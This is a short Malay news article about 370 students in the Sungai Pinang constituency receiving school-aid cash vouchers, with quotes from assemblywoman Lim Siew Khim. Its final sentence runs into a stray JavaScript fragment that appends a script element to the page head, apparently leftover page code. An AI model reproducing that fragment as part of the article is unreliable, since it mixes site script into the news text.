Pelajar KADUN Sg. Pinang terima bantuan persekolahan

Gambar: SHUM JIAN WEI

SUNGAI PINANG – Seramai 370 pelajar dari lapan sekolah dalam kawasan Dewan Undangan Negeri (KADUN) Sungai Pinang menerima bantuan persekolahan berupakan baucar tunai di sini baru-baru ini.

Ahli Dewan Undangan Negeri (ADUN) nya, Lim Siew Khim berkata, bantuan yang disumbangkan saban tahun tersebut merupakan salah satu gerak kerja amal dalam membantu keluarga kurang berkemampuan sama ada dari fizikal mahupun perbelanjaan.

“Tahun lalu, kita cuma dapat memberi bantuan kepada 150 pelajar sahaja, tetapi tahun ini, hasil sumbangan dari badan-badan bukan kerajaan dan tajaan orang perseorangan, kita dapat menambah bilangan penerima.

“Saya harap dengan bantuan persekolahan ini, ia dapat meringankan bebanan ditanggung oleh ibu bapa dan berharap ia dapat dimafaatkan sepenuhnya oleh para penerima,” katanya kepada pemberita sejurus selesai majlis penyampaian bantuan di Pusat Aktiviti KADUN Sungai Pinang di sini baru-baru ini.

Selain penyampaian bantuan, turut diadakan sesi memotong rambut percuma sebagai persediaan untuk pelajar memulakan sesi baharu 2015 nanti.d.getElementsByTagName(‘head’)[0].appendChild(s);